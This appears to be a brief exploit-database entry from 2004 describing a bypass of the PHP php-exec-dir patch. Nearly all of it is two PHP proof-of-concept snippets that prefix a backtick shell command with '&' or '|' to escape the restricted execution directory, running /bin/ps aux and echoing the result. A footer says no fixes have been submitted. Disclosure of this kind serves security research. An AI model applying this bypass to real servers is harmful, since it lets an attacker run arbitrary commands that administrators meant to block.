PHP (php-exec-dir) Patch Command Access Restriction Bypass

2004-08-08 00:00:00

<?php
$blah = `& /bin/ps aux`;
echo nl2br($blah);
?>

<?php
$blah = `| /bin/ps aux`;
echo nl2br($blah);
?>


#

Fixes

No fixes

In order to submit a new fix you need to be registered.